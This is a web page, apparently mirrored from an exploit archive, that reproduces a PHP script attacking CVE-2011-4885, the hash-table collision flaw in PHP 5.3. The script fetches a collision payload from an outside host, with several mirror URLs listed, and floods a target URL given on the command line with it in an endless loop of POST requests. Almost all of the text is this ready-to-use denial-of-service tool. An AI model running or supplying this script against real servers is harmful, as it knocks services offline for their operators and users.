扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 |
# Exploit Title: CVE-2011-4885 PHP Hashtables Denial of Service Exploit # Date: 1/1/12 # Author: infodox # Software Link: php.net # Version: 5.3.* # Tested on: Linux # CVE : CVE-2011-4885 Exploit Download -- http://infodox.co.cc/Downloads/phpdos.txt <?php /* PHP 5.3.* Hash Colission DoS Exploit by infodox Original version by itz me (opensc.ws) CVE-2011-4885 Mirrors List: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18296.txt (hashcollide.txt) http://compsoc.nuigalway.ie/~infodox/hashcollide.txt http://jrs-s.net/hashcollide.txt http://www.infodox.co.cc/Downloads/hashcollide.txt Changes: Different mirror for hashcollide.txt Now takes target as a command line argument Status message printing Twitter: @info_dox Blog: blog.infodox.co.cc Site: http://www.infodox.co.cc/ */ $targ = $argv[1]; $x = file_get_contents("http://jrs-s.net/hashcollide.txt"); // if this doesnt work replace with the mirrors_lst ones... while(1) { echo "firing"; $ch = curl_init("$targ"); curl_setopt($ch, CURLOPT_POSTFIELDS, $x); curl_exec($ch); curl_close($ch); echo "[+] Voly Sent!"; } ?> |
体验盒子
